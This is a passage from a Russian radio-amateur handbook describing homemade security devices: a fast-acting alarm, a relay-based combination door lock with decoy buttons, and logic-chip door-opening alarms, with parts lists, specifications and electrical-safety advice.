Изготавливается быстродействующее охранное устройство в виде двух блоков в корпусах прямоугольной конструкции, имеющих лицевые панели и крышки, в которых предусматриваются вентиляционные отверстия. Монтаж ЭРИ и ЭРЭ производится печатным способом на плате из фольгированного одностороннего гетинакса или стеклотекстолита толщиной до 2 мм.
Сетевой трансформатор Т1, диодная сборка VD1 и мощные транзисторы VT1 и VT3 устанавливаются отдельно на металлическом шасси и радиаторе охлаждения. На лицевых панелях БП и БЭ размещают органы управления, ИП PV1, разъемы электрических соединителей, приборные контактные зажимы и держатели предохранителей F1 и F2. Все электрические соединители выполняются или способом печатного монтажа, или отрезками тонкого монтажного провода, имеющего надежную изоляцию. Достаточная простота схемно-технического решения позволяет монтировать охранное устройство в условиях радиолюбительской лаборатории и не требует сложной настройки и регулировки.
В данном электронном охранном устройстве применены покупные комплектующие ЭРЭ широкого назначения, большинство из которых имеет соответствующие зарубежные аналоги. В качестве измерительного вольтметра может быть использован покупной прибор типа М4231-40 или любой другой вольтметр постоянного тока, рассчитанный на измерение напряжения до 20 В. Можно применить электрические соединители типа ОНЦ-ВГ, СЩ-5, СГ-5, СНО, СНЦ, РПМ.
При монтаже и эксплуатации этого охранного устройства необходимо соблюдать правила электробезопасности. Надо помнить, что источник переменного напряжения имеет высокое опасное для жизни напряжение — 220 В.
Основные электрические параметры и технические характеристики быстродействующего охранного устройства
Номинальное напряжение питающей сети переменного тока, В ....................... .220 или 127
Номинальная частота питающей сети переменного тока, Гц ........................ .50
Номинальное напряжение автономного или внешнего источника питания постоянного тока, В ... .12
Пределы изменения напряжения питающей сети неременного тока, В .................... .180...240 или 110...140
Пределы изменения частоты питающей сети переменного тока, % ................... .±1
Пределы изменения напряжения автономного источника питания, при которых сохраняется устойчивая работа устройства, В ........... .8,5...14
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .12
Регулируемое выходное стабилизированное напряжение БП, В ......................... .2...12
Нестабильность выходного напряжения постоянного тока, %, не более ..................... . 0, 1
Амплитуда пульсации выходного напряжения
постоянного тока,мВ, не более ............. 5
Напряжение вторичной стабилизации, В ........ 5
Коэффициент стабилизации напряжения постоянного тока
, не менее .................... 100
Время срабатывания устройства при размыкании контактов, с, не более:
S1- S3 .......................... 50
S4. S6 .......................... 1
Генерируемая частота звукового сигнала при
работе устройств, Гц ................... 1100
Количество одновременно охраняемых объектов, шт . 2...10 Уровень давления звукового сигнала при полной мощноти и на расстоянии 1 м от источникя звука, дБ, не более ......................... 110
Mощность, потребляемая устройством в дежурном
режиме работы, мВт, не более ............. 20
Мощность, потребляемая устройством при срабатывании звукового сигнала, Вт ............. 20
Помехозащищенность устройства при воздействии
внешнего электромагнитного поля, дБ, не менее . 100 Сопротивление изоляции токоведущих частей устройства относительно металлического корпуса, МОм, не менее .................... 15
Масса устройства в комплекте, кг ............ 1,6
кпд, %, не менее ........................ 80
Срок службы устройства, ч ................. 5000
Вероятность безотказной работы устройства при
риске заказчика в =0,9, не менее .......... 0,98
Рис. 2.10. Принципиальная схема быстродействующего охранного устройства.
2.11. ПРОСТОЙ РЕЛЕЙНЫЙ ОХРАННЫЙ АВТОМАТ
Релейный автомат предназначен для установки на входных дверях жилых домов, помещении, внутренних дверях производственных объектов и т. д.
В устройстве применены покупные комплектующие ЭРИ и ЭРЭ, которые рассчитаны на эксплуатацию в условиях климатических и механических нагрузок. Это устройство, конструктивно изготовленное достаточно герметично, может работать при температуре окружающего воздуха от —30 до 45 °С, при относительной влажности окружающей среды до 90% при температуре 25 °С и при пониженном атмосферном давлении до 5 мм рт. ст.
Работает релейный автомат от сети переменного тока напряжением 220 или 127 В частотой 50 Гц. Источник электропитания может быть выполнен в двух вариантах:
в виде встроенного узла, составляющего единое целое с релейным автоматом, и в виде автономного источника постоянного тока напряжением 24 В.
Принципиальная электрическая схема простого релейного охранного автомата приведена на рис. 2. 11. Рассматриваемый релейный автомат включает при правильном наборе шифра электромагнит открывания дверей. Шифр автомата устанавливается включением перемычек, три из которых являются рабочими, а остальные фальшивыми. Таким образом, расшифровка заключается в правильном наборе трех цифр шифра на специальном щитке с кнопками. Следует заметить, что каждой цифре кода соответствует своя кнопка, которую необходимо нажать при наборе. Порядок соединения контактов переключателей должен быть строго определенным.
Как следует из электрической схемы, релейный автомат включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, выпрямительное устройство для электропитания обмоток реле, схему релейного автомата, выходные цепи и ИМ со звуковой или световой сигнализацией.
Подключение релейного автомата к сети переменного тока обеспечивается электрическим переключателем X1 типа «вилка» и штепсельной розеткой. Малогабаритный двухполюсный переключатель S1 служит для подачи электропитания на ИМ, электрический звонок и релейный автомат. На входе устройства собран емкостный фильтр на конденсаторах С1 и С2, защищающий его от ложных срабатываний и электромагнитных помех, которые проникают в сеть питания. Два плавких предохранителя F1 и F2 защищают входные цепи и элементы схемы от перегрузок и коротких замыканий, которые могут возникнуть по различным причинам: из-за неисправности ЭРЭ, неправильного монтажа элементов, неправильного включения трансформатора и др.
Сетевой понижающий трансформатор питания Т1, примененный в охранном устройстве, относится к числу унифицированных трансформаторов типа ТПП. Он рассчитан на подключение к сети переменного тока напряжением 110, 127, 220 и 237 В. На выводах вторичных обмоток трансформатора действует переменное напряжение от 2, 5 до 10 В. Изготавливается трансформатор на витом ленточном магнитопроводе типа ШЛ или ШЛМ с уменьшенным расходом меди. Наматывается одна катушка, которая устанавливается на центральный стержень с активной площадью поперечного сечения стали не менее 6,5 см2. Вместо унифицированного покупного трансформатора питания можно применить самодельный, изготовленный в соответствии с техническими характеристиками, изложенными в табл. 2.15. Сетевой трансформатор можно изготовить на магнитопроводе, шихтованном из пластин электротехнической стали типа Ш20х30 с двумя или тремя обмотками.
Сетевой трансформатор Т1 выполняет функцию трансформации высокого напряжения переменного тока 220 В в низкое напряжение, не превышающее 24В; обеспечивает гальваническую развязку первичных и вторичных цепей релейного автомата, относительную электрическую безопасность при работе с низковольтным напряжением, электропитание маломощного паяльника, расчетное значение выпрямленного напряжения постоянного тока, необходимого для электропитания электромагнитных реле К.1—К.4.
Если у радиолюбителя есть трансформатор, но неизвестны его тип и электрические параметры, то необходимо, пользуясь простым омметром, определить расположение выводов всех обмоток трансформатора. Как правило, вторичная отмотка трансформатора имеет сравнительно небольшое число витков достаточно толстого
Таблица 2.15.Моточные данные сетевого понижающего трансформатора питания Т1, примененного в простом релейном охранном автомате
провода, значит, по этому признаку можно предварительно определить выходные обмотки. Но иногда это сделать невозможно, если таких обмоток много и они предназначены для выполнения различных функций (накальные, анодные, для питания ППП и др.).
При наличии зазора между катушкой и магнитопроводом на катушку поверх обмоток наматывают одну дополнительную обмотку с максимально возможным количеством витков. На одну из вторичных обмоток этого трансформатора подают напряжение переменного тока 5 В. Измерив напряжение на каждой обмотке трансформатора, в том числе и на дополнительной, определяют число витков любой обмотки по известным формулам, пользуясь исходными данными.
На выходе сетевого трансформатора собран полупроводниковый выпрямитель на четырех диодах по однофазной двухполупериодной мостовой схеме. Так как на выходе вторичных обмоток трансформатора действуют напряжения переменного тока меньше расчетного значения, необходимо включить вторичные обмотки последовательно, как показано на схеме. Выпрямитель, собранный по мостовой схеме, имеет ряд положительных и отрицательных параметров и характеристик. К положительным относятся: повышенная частота пульсации выпрямленного напряжения постоянного тока на выходе выпрямителя; уменьшенная величина обратного напряжения, действующего на комплекте выпрямительных диодов; более полное использование габаритной мощности сетевого трансформатора Т1. К отрицательным — несколько увеличенные потери мощности, более низкий кпд, невозможность установки выпрямительных диодов на одном металлическом радиаторе без промежуточных изоляционных прокладок, повышенный расход полупроводниковых диодов и более высокая стоимость изготовления этого выпрямителя.
Выпрямитель работает на емкостный фильтр, собранный па электролитическом конденсаторе СЗ, который служит для дополнительного сглаживания пульсации постоянного тока.
На выходе вторичных обмоток сетевого трансформатора в режиме номинальной нагрузки действует переменное напряжение: на выводах 11 и 12 действует напряжение 10 В, если на первичную обмотку подано напряжение 220 В (выводы 2 и 9); на выводах 13 н 14 — 10 В; на
выводах 15 и 16 — К) В; на выводах 17 н 18 — 10 В; на выводах 19 н 20 — 5В и на выводах 21 и 22 — 5 В.
В данном автомате применен трехзначный шифр, который набирается установлением перемычек между соединителями Х2 Х15. Как видно из схемы, перемычки между контактами Х2 н ХЗ, Х8 и Х9, X11 и Х15 соединены между собой и подключены к обмотке реле К4. Перемычки между Х4 и Х5 соединяются с обмоткой реле К1, перемычка между X6 и Х7 соединяется с обмоткой реле К2 и перемычка между контактами Х10 и X11 — с обмоткой реле КЗ. Таким образом, рабочими перемычками в данном наборе являются перемычки между контактами Х4 и Х5, Х6 и Х7, X10 и X11. Остальные перемычки - дежурные. Следует заметить, что в данном случае зашифровано число 235, но если переставить эти перемычки, то можно установить практически любое число, составленное из цифр от 1 до 7.
Для того чтобы войти в помещение, необходимо последовательно, в установленном порядке нажать кнопки переключателей S4, S5 и S7. Каждой цифре соответствует своя кнопка, которая нажимается при наборе номера. При этом первая цифра шифра всегда является вилкой, подключаемой к контакту Х5, вторая цифра соответствует вилке, подключаемой к контакту Х7, и третья цифра кода соответствует вилке, подключаемой к контакту X11. Теперь, если надо зашифровать номер, например 751, то необходимо вилку с контакта Х5 переключить на контакт Х15, вилку с контакта Х7 — на контакт X11, а вилку с X11 — на контакт ХЗ. Остальные вилки, соединенные с обмоткой реле К4, подсоединить к оставшимся свободными контактам.
Релейный автомат работает следующим образом. Зная установленный шифр — 235, сначала нажимается кнопка переключателя S4, соответствующая цифре 2, тем самым подается постоянное напряжение на обмотку реле К1, которое срабатывает, переключая свои контакты. Замкнутые контакты реле К1.1 блокируют нажатую кнопку S4, и ее можно отпустить — реле К1 останется под напряжением; затем нажимается кнопка S5, контакты которой замыкают цепь питания реле К2, оно срабатывает, замыкая свои контакты К2.1 и К2.2. Контакты К2.1 самоблокируют питание реле К2, а контакты К2.2 подготавливают реле КЗ к срабатыванию, если следующая цифра также будет набрана правильно. И теперь, нажав на кнопку S8, соответствующую цифре 5, напряжение будет подано на реле К3. Контакты сработавшего реле КЗ (КЗ.1) заблокируют питание этого реле, а контакты КЗ.2 при замыкании подадут питание на электромагнит, установленный на двери. Сердечник ЭМ1 втягивается внутрь обмотки и открывает механический замок.
Электромагнитные реле К1-КЗ остаются включенными в течение всего времени набора шифра и до тех пор, пока дверь не будет oткрыта, то есть будут разомкнуты контакты конечного выключателя S2, установленного скрытно на дверях. Эти контакты включены последовательно с обмотками электромагнитных реле. При размыкании контактов S2 питающее напряжение снимается со всех реле. Они обесточиваются, подготавливая автомат к приходу следующего посетителя.
Для защиты объекта от вторжения посторонних лиц, не знающих шифра, в принципиальную схему включено дополнительное электромагнитное реле К4. Его обмотка соединена с вилками контактов ХЗ, Х9, Х13, Х15, которые соединены со свободными контактами. И только стоит нажать на одну из этих кнопок, как реле К4 сработает и разомкнет контакты К4.1 и цепь питания реле.
Теперь, если посторонним лицом были случайно правильно набраны одна или две цифры кода, они сбросятся, и придется набирать весь шифр снова, с самого начала. Причем одновременно со сбросом набранных цифр прозвенит звонок ВА1, питание на который подается через контакты К4.2 при срабатывании реле К4.
При изготовлении релейного автомата использованы следующие комплектующие ЭРИ и ЭРЭ: выпрямительные диоды VD1— VD4 типа КД105Б; электромагнитные реле К1—КЗ типа РЭС-9, РСМ, РВМ-2С-110; самодельный или покупной сетевой понижающий трансформатор питания Т1 типа ШЛМ; конденсаторы С1 типа МБМ-II-750В-0.05 мкФ, С2 — МБМ-II-750В-0,05 мкФ, СЗ — К50-3-50В-100 мкФ; предохранители F1. F2 типа ПМ-1-0,5 А; электрические соединители X1 типа «вилка», Х2—Х15 типа КМЗ-1; светодиод HL1 типа АЛ307В; диод VD5 типа Д223; резистор R1 типа МЛТ-0,25-2,4 кОм; переключатели S1 двухполюсный типа ТП2-1 или П2Т-1-1, S2 — КМ1-1, S3— S9 — КП-1 с одним постоянно разомкнутым контактом; электромагнит ЭМ1 самодельной конструкции или покупной с напряжением питания 220 В; звонок электрический ВА1 покупной.
Конструктивно релейный автомат состоит из нескольких самостоятельных сборочных единиц: шифровальной и дешифровальной сборки, в которой устанавливаются малогабаритные приборные контакты и перемычки; выпрямительного устройства с электромагнитными реле;
электромагнита в качестве ИМ и замка с защелкой;
кнопочной коробки; электрического звонка и сигнальной лампы.
Соединения всех узлов и сборок между собой рекомендуется осуществлять с помощью электрических соединителей. Многие детали конструкции можно изготовить в домашней мастерской (особенно те, которые входят в механический замок).
Сетевой трансформатор, выпрямительное устройство и электромагнитные реле монтируются в пластмассовой или металлической коробке подходящих размеров, которая устанавливается в охраняемом помещении недалеко от входной двери. На передней панели корпуса коробки укрепляются гнезда или приборные клеммы. На вилках, подключенных проводниками к электромагнитным реле К1—КЗ, необходимо написать номера этих реле, что позволит быстро и безошибочно устанавливать ежедневный шифр из трех знаков. Остальные вилки от реле К4 не обозначаются, так как они вставляются в свободные гнезда.
Для монтажа подходят любые электромагнитные реле, рассчитанные на 24 В и имеющие нормально замкнутые и нормально разомкнутые контакты. В качестве выпрямительных диодов можно применить выпрямительные диоды типа Д202—Д205.
Электромагнит вместе с пружинным механическим замком устанавливается на входной двери. Замок дорабатывается в следующем порядке. Необходимо сначала снять крышку и вынуть подвижную часть замка. На его направляющих просверливаются два отверстия диаметром по 2 мм, в которые вставляются стальные проволочные тяги. На боковой поверхности замка просверливаются тоже два отверстия диаметром до 4 мм, через которые пропускаются эти проволочные тяги. Замок вновь собирается, крышка возвращается на место. Устанавливая замок и электромагнит на место, надо обратить внимание на длину рычага, входящего в замок от открывающегося ключом механизма. Длина проволоки определяется по месту.
В релейном автомате может быть применен соленоид, изображенный на рис.2.12. Условно в состав конструкции соленоида входят неподвижный и жестко укрепленный в
Рис. 2.12. Конструкция соленоида.
задней части катушки соленоида дополнительный сердечник 1; диэлектрический каркас катушки 2 с обмоточным проводом 3 марки ПЭЛ, ПЭВ-1 или ПЭВ-2; к вспомогательному сердечнику 1 прикреплена(приклеена)тонкая шайба из картона или бумаги 4; провод катушки сверху закрыт изоляционной лентой 5 или плотным диэлектрическим кожухом; сердечник соленоида 6, который так же, как и вспомогательный сердечник, изготавливается из мягкого железа (электротехнической стали марок 3311, 3312, 3313). На катушку соленоида надо намотать рядовой намоткой 4500 витков обмоточного провода марки ПЭВ-1 диаметром 0,31 мм. Дополнительные детали конструкции соленоида необходимо выполнить при его установке вместе с замком на входной двери по эскизному рис. 2.13, где 1 — соленоид; 2 — переходная соединительная втулка; 3 — стальная проволочная тяга (2 шт);
4 — ригельный замок; 5 — входная дверь.
Электрическое соединение всех узлов релейного автомата осуществляется многожильным кабелем в электропрочной изоляции. В местах перегибов монтажных проводов, например между дверью и стеной, на кабель надеваются мягкие резиновые трубки и оставляется некоторый запас кабеля. Это предохранит его от перетирания при частом открывании входных дверей.
Дверную блокировочную кнопку-переключатель тоже можно изготовить самостоятельно из двух латунных пластинок, первая из которых укрепляется на подвижной части двери, а вторая — на косяке или коробке двери.
Рис. 2.13. Установка соленоида и механического замка на входной двери охраняемого объекта.
Правильно собранная электромонтажная схема релейного автомата начинает работать сразу же после включения электропитания.
Радиолюбитель, выполняя различные электромонтажные работы, должен знать основные правила безопасности, позволяющие сделать минимальным воздействие неблагоприятных факторов в отношении не только себя, но и окружающих.
При работе с электричеством необходимо любые действия производить вдали от водопроводных труб, радиаторов парового отопления и ванн, исключить даже случайное прикосновение к ним; заменять детали при ремонте следует только после отключения блоков релейного автомата от сети, обязательно вынимая вилку со шнуром питания из сетевой розетки; после отключения источника электропитания обязательно разрядить конденсатор СЗ;
нельзя проверять исправность плавких предохранителей в устройстве путем замыкания их.
Основные электрические параметры и технические характеристики простого релейного охранного автомата
Номинальное напряжение питающей сети неременного тока, В ....................... .220 или 127
Номинальная частота питающей сети переменного
тока, Гц ............................ .50
Номинальное напряжение автономного источника
питания постоянного тока, В .............. .24
Номинальное напряжение питания электромагнитных реле, В ......................... .24
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .10
Пределы изменения напряжения питающей сети переменного тока, В .................... .187...242 или
110... 140
Пределы изменения напряжения автономного
источника питания, В ................... 20...25
Пределы изменения частоты питающей сети
переменного тока, Гц ................... 49...51
Напряжение на выводах вторичных обмоток сетевою трансформатора питания Т1, В:
11 и 12, 13 и 14, 15 и 16, 17 и 18 ......... 10
21 и 22, 23 и 24 ..................... 2,5
Количество одновременно охраняемых объектов, шт . . 1
Количество цифр в шифре, шт .............. 3
Количество вариантов комбинации релейного
автомата при наборе шифра, шт ............ 1000
Максимальная мощность релейного автомата при
срабатывании электромагнита, Вт, не более .... 100
Количество разрядов кодовой комбинации ....... 7
Срок службы, ч, не менее .................. 10 000
Сопротивление изоляции реле в нормальных условиях эксплуатации, МОм, не менее .......... 20
Время отпускания реле, мс, не более .......... 7
Вероятность безотказной работы автомата при
риске заказчика в=0,92, не менее .......... 0,98
Задержка времени срабатывания релейного автомата, с, не более ..................... 0,5
Ток, потребляемый устройством в режиме холостого хода, мА, не более .................. 20
Минимальная мощность электромагнита, Вт ..... 60
Условия эксплуатации:
температура окружающей среды, °С ......... —25. ..4-45
относительная влажность воздуха при температуре 25 °С, %, не более ................. 92
атмосферное давление, мм рт. ст. ........... 200...900
Рис. 2.11.Принципиальная схема простого релейного охранного автомата.
2.12. ЭЛЕКТРОННЫЕ ОХРАННЫЕ УСТРОЙСТВА, СИГНАЛИЗИРУЮЩИЕ ОБ ОТКРЫВАНИИ ВХОДНЫХ ДВЕРЕЙ ПОМЕЩЕНИЙ
Существует много простых, надежных и долговечных электронных устройств, которые сигнализируют о нежелательном открывании дверей или окон. Самым простым и в то же время безотказным решением задачи охраны является применение микропереключателей, позволяющих разрывать или замыкать электрические цепи как в режиме холостого хода, так и в режиме рабочей нагрузки (некоторые их типы см. в табл. 3. 3). В отличие от простого электрического переключателя герметичный контакт (геркон), переключаемый постоянным магнитом, без сложных переделок и изменений можно использовать только для включения или выключения сторожевых устройств. В этом случае при открывании двери или окна геркон должен переходить, из одного конечного состояния в другое.
Существует большое количество вариантов установки переключателей, среди них наиболее интересные — со скользящими контактами. При открывании двери или створок окна контакт в скользящем переключателе испытывает воздействие электромагнитного поля. Это дает возможность производить запуск сигнального устройства, в котором применен триггер, срабатывающий при открывании дверей даже на очень короткое время. При этом необходимо учитывать, что если триггер находится на значительном расстоянии от контакта, установленного на двери, следует предусмотреть в схеме устройства монтаж электрической цепочки тина RC на входе триггера для предотвращения ложных срабатываний.
Важное значение для устойчивой работы охранных устройств имеет качество и надежность срабатывания конечных выключателей и контактов. Открытые контакты всегда подвержены воздействию внешних атмосферных факторов и нагрузок, среди которых особенно опасной является повышенная относительная влажность окружающей среды. Поэтому через контакты конечных выключателей должен течь лишь минимально допустимый ток или должно подаваться определенное минимально допустимое напряжение для предотвращения искрения и образования на поверхностях этих контактов нагара.
При изготовлении ЭУОС и при прокладке электрических цепей от электронных блоков и пультов управления до замыкающих и размыкающих контактов необходимо выполнять строго определенные правила и рекомендации. Например, электрический переключатель, рассчитанный на максимальный ток 10А, допускает минимальный ток 100мА, если речь идет о замыкающих контактах. Но в принципе можно следовать такому проверенному практикой правилу: контактные устройства, предназначенные для меньших максимально допустимых токов, наиболее пригодны для небольших рабочих токов. Это необходимо учитывать также тогда, когда пружины контактов переключателей играют роль и самих контактов. При этом рекомендуется предусмотреть в схеме параллельное резервирование для нормально разомкнутых контактов. Но ток в этом случае распределяется между несколькими контактами. Для монтажа схем с нормально замкнутыми контактами более целесообразным является последовательное резервирование, обеспечивающее предотвращение возможного залипания контактов. Тогда из нескольких последовательно включенных контактов сработает по меньшей мере один.
При протекании токов до 10мА необходимо учитывать также переходное сопротивление контактов, которое иногда является решающим фактором для надежной работы всего охранного устройства.В некоторых контактных парах это сопротивление может достигнуть десятков Ом.
Используемые в электронных схемах контакты герметичных типов имеют преимущества перед открытыми контактами, так как связаны с ограничением минимального тока, который иногда не превышает 1 мА, простотой установки и высокой надежностью срабатывания. Постоянные магниты, необходимые для таких контактов, можно использовать от магнитных защелок, применяемых при изготовлении мебели.
Если контакты, устанавливаемые на дверях или окнах, расположены на значительном расстоянии от БЭ, пульта управления или от источника электропитания, то потребуется надежная профессиональная прокладка соединительных проводов. Для начинающих радиолюбителей эта работа должна всегда оставаться на первом месте и тщательно выполняться, особенно в тех случаях, когда проводка предназначена для передачи высокого напряжения переменного тока 220 В.
Рекомендуется домашним мастерам с первых же самодельных, а также покупных УОС вести запись всех линий проводки и проводников в квартире, доме на приусадебном участке или в других помещениях с указанием места и направления прокладки, а также цвета проводов и типа соединений. Это правило обеспечивает максимально возможную электробезопасность и условия устойчивой и долговечной работы самодельных ЭУОС.
На садово-огородных участках для соединения проводниками всех контролируемых объектов и отдельных мест, расположенных как по периметру охраняемого участка, так и внутри дома, можно рекомендовать последовательное включение датчиков и конечных выключателей, что потребует лишь одной линии связи. Но при этом контактные пары должны быть нормально замкнутыми. При разрыве какого-либо из этих контактов срабатывает сигнализация, однако информация о том, в каком месте произошел разрыв, отсутствует. При установке нормально разомкнутых контактов по месту необходимо применить один двухжильный провод. Но и в этом случае неизвестно, в каком месте сработал контакт.
Рассматриваемые УОС с большим количеством конечных выключателей и контактных пар менее критичны к воздействию различных условий эксплуатации, если они реализуются на базе малых или больших ИМС, а контакты соединяются в группы и подключаются к входам одной микросхемы. Однако это лучше делать только после того, как начинающим радиолюбителем будет собрано достаточно большое количество разнообразных РЭУ и приборов. Необходимо учитывать, что при прокладке длинных соединительных линий, подключаемых к ИМС, легко происходят ложные срабатывания и приходится принимать дополнительные меры защиты: например, при использовании нормально разомкнутых контактов емкость конденсаторов должна быть большой величины, чтобы импульс тока их зарядки не приводил бы к залипанию контактов; в этом случае лучше применять лакопленочные конденсаторы емкостью не менее 1мкФ.
Используя важнейшие и специальные свойства ИМС, в частности логической системы И-НЕ или 2И-НЕ, и поступление на ее входы потенциалов высокого уровня логической единицы, через которые текут очень маленькие токи, можно собрать на базе таких ИМС охранные устройства со световой сигнализацией на малогабаритных индикаторных лампочках, напряжения питания которых не превышают 5...6В, а ток на них не превышает 50мА. Сегодня очень часто в электронных схемах применяются вместо лампочек накаливания светодиоды, которые включаются через балластные резисторы. Большинство схем включения светодиодов содержат конденсаторы емкостью до 0,01мкФ и рассчитаны таким образом, что при срабатывании какого-либо контакта происходит передача сигналов на элементы микросхемы, благодаря чему загорается светодиод или лампочка накаливания, включенная между этим входом и плюсовым проводником схемы. На выходе такой ИМС низкий уровень логического нуля сменяется высоким уровнем логической единицы. Эта смена сигнала на выходе микросхемы используется или непосредственно для управления
Рис.2.14. Принципиальная схема устройства охраны с сигнализацией на одной микросхеме.
входом транзистора n-р-n-структуры, или после инвертирования для управления работой генератора.
На рис. 2. 14 приведена принципиальная электрическая схема устройства охраны с сигнализацией, собранного на одной ИМС. Это устройство предназначено для оповещения о состоянии входных дверей или окон, об их открывании и закрывании. Разработано устройство охраны для установки в домах и хозяйственных постройках бытового и производственного назначения, но область применения его может быть расширена по желанию домашнего мастера, учитывая возможности электронной схемы, тем более что в качестве датчиков могут быть использованы герметичные нормально замкнутые контакты, удерживаемые постоянным магнитом, самодельные конечные выключатели, унифицированные микропереключатели типа МП-1 и другие переключатели. Как видно из схемы, оксидный конденсатор С1 является конденсатором задержки срабатывания и включен параллельно датчику-контакту, замкнут накоротко через резистор R1, предназначенный для предотвращения перегрузки импульсов тока этого конденсатора при его разрядке.
При замкнутых контактах конечного выключателя в режиме ожидания охранного устройства на выходе ИМС DAI (выводы 1 и 2} действует низкий уровень логического нуля, в это же время на выходе ИМС (вывод 3) действует высокий уровень логической единицы. Надо заметить, что ИМС, использованная в устройстве, включает в себя четыре логических элемента 2И-НЕ, которые имеют соответствующие входы и выходы. Первый элемент схемы имеет выводы 1, 2 и 3; второй — 4, 5 и 6; третий — 8, 9 и 10; четвертый — 11, 12 и 13.
В режиме ожидания или холостого хода на выводе 4 (выход второго элемента ИМС) действует низкий уровень логического нуля; на выводе 10 (выход третьего элемента) действует высокий уровень, логической единицы и на выводе 11 ИМС (выход четвертого элемента) действует низкий уровень логического нуля. Вследствие этого транзистор VT1, подключенный к выходу 11 ИМС схемы через резистор ограничения тока, заперт.
При размыкании контактов конечного выключателя S1 начинается зарядка конденсатора С1 в течение заданного промежутка времени, который определяется номинальными значениями сопротивления резистора R2 и емкости конденсатора С1. Резистор R2 рассчитан на номинальное сопротивление 100кОм, которое можно изменять, меняя время задержки подачи сигнала открывания дверей охраняемого объекта в широких пределах.
При некотором оптимальном значении напряжения на конденсаторе С1 включается в работу тактовый генератор, собранный на первых двух элементах ИМС DA1 (выводы 1—б), вызывая подачу сигналов низкой частоты на вторую часть ИМС DA1, и начинают вырабатываться импульсы звуковой частоты, которые поступают на транзистор VT1, усиливаются и передаются на звукоизлучатель: громкоговоритель ВА1 или телефонный капсюль.
Телефонный капсюль, примененный в устройстве, может быть выбран из числа электромагнитных типа ТА-4, ДЭМ-4М, ТК-67.
Сторожевое устройство, собранное по указанной принципиальной схеме (рис.2.14), позволяет открывать и закрывать входные двери и окна без подачи звукового сигнала в период определенного времени. Конденсатор задержки подачи звукового сигнала можно включать и выключать с помощью однополюсного переключателя, который может быть введен в принципиальную схему, а на практике установлен в недоступном и скрытом от посторонних лиц месте. Такой же результат можно получить за счет отключения резистора, подсоединенного со стороны плюсового вывода источника питания GB1.
При сборке и регулировке охранного устройства использованы следующие покупные комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К176ЛА7; конденсаторы С1 типа К50-6-6,ЗВ-100мкФ, С2 — К53-1-6.3В-0.5 мкФ, СЗ — К10-7В-25В-680пФ; резисторы R1 типа МЛТ-0,25-100Ом, R2 — СПЗ-4М-0, 25Вт-100 кОм,
Рис 2.15. Принципиальная схема устройства охранной сигнализации.
R3 -- МЛТ-0,25-1 МОм, R4 — МЛТ-0,25-1 МОм, R5-МЛТ-0,25-1 кОм, R6 — МЛТ-0,25-1 МОм, R7 — МЛТ-0,25-1МОм;
транзистор VT1 типа КТ342А; выпрямительный диод VD1 типа Д237А; ХИТ GB1 типа 3336 или три элемента типа 373, «Орион-М».
Электропитание охранного устройства осуществляется от автономного источника постоянного тока напряжением 4,5 В.
Простота устройства при правильной сборке и монтаже обеспечивает ему надежную работу без дополнительной настройки и регулировки. Большое значение имеет качество комплектующих ЭРЭ и ЭРИ.
На рис.2.15 приведена принципиальная электрическая схема устройства охранной сигнализации, разработанная на одной ИМС и работающая аналогично рассмотренной выше. Эта принципиальная схема имеет меньшее количество комплектующих ЭРЭ, основным из которых также является ИМС, выполненная по КМОП-технологии. Данная ИМС в соответствии с принятой классификацией относится к числу логических схем и включает в свой состав четыре функциональных элемента типа 2И-НЕ. Она характеризуется высокими электрическими параметрами и незначительным потреблением электроэнергии.
Напряжение электропитания ИМС равно 9 В±5%;
ток потребления в состоянии логического нуля не превышает 2X10^(-4)мА; а в состоянии логической единицы — также не более 2X10—4мА; задержка включения и выключения ИМС не превышает 80 нс. К серии этих ИМС
относятся следующие типы: К176ЛА7, К164ЛА7, К561ЛЛ7, К564ЛА7.
Электропитание устройства осуществляется от ХИТ батареи типа 3336 или любых трех последовательно соединенных элементов типа 316, 332, 343, 373, «Планета», «Сатурн».
Транзистор VT1, включенный на выходе ИМС, выполняет функцию усилителя мощности. При замкнутых контактах переключателя S1 или если включить на выходе устройства переменный резистор (на схеме показан пунктирной линией), плюс питающего напряжения попадает на внутреннюю шину ИМС через один из диодов, минуя вывод 14. Следует заметить, что ИМС DA1 работает без подключения к выводу 14 источника питания от батареи GB1. После замыкания контактов S1 включается в работу первый ждущий мультивибратор, собранный на двух элементах ИМС (выводы 1, 2, 3, 4, 5, 6), который начинает вырабатывать прямоугольные импульсы, следующие с частотой 3 Гц. С выхода первого мультивибратора (вывод 4) эти импульсы поступают на вход второго мультивибратора (вывод 8), и он включается в работу и начинает вырабатывать импульсы частотой до 3000 Гц. В громкоговорителе или телефоне ВА1 слышится звук, который можно изменять переменным резистором R5.
При изготовлении данного устройства применены следующие комплектующие ЭРИ и ЭРЭ: транзистор VT1 типа КТ315Г:
ИМС DA1 типа К176ЛА7; резисторы R1 типа МЛТ-0,25-300 кОм, R2 — МЛТ-0,25-330кОм,R3—МЛТ-0,25-270кОм R4—МЛТ-0,25-15кОм,R5—СПЗ-1-0,25Вт-100кОм;телефон ВА1 типа ДЭМШ или ДЭМ-4М; переключатель S1 типа МП-1-1;
электрические соединители X1— Х4 типа КМЗ-1 приборные;
конденсаторы С1 типа К73-17-63В-1 мкФ, С2 — К10-7В-50В-М1500-1000 пФ.
Правильно собранное охранное устройство начинает работать сразу же после сборки и ни регулировки, ни настройки не требует. Необходимо заметить, что устройство не критично к выбору номиналов резисторов и конденсаторов. При их изменениях меняется тональность звуковых колебаний в громкоговорителе.
2.13. ЭЛЕКТРОННЫЙ СТОРОЖ ДЛЯ САДОВО-ОГОРОДНОГО УЧАСТКА
Садово-огородные участки и приусадебные территории, расположенные вдали от централизованных пунктов охранной сигнализации и ЦПУ, удаленные от городов и городских поселков, где, как правило, находятся мощные и постоянно действующие подразделения охраны, а также отдельные садовые участки в больших массивах различных овощеводсв и садоводств, занимающих общую площадь в несколько десятков и сотен гектаров, требуют специальных мер защиты. Этот вопрос охраны особенно актуален в период созревания плодово-ягодных и овощных культур, когда хищения созревшего урожая становятся иногда массовым явлением.
Некоторые садоводства, объединенные в крупные товарищества, организуют совместную охрану территории с привлечением сотрудников милиции и других охранных структур. Однако их сторожевые посты находятся далеко не только друг от друга, но и от охраняемых участков, и в этом случае без специальных охранных устройств очень трудно осуществлять эффективную защиту в первую очередь жилых домов и хозпостроек.
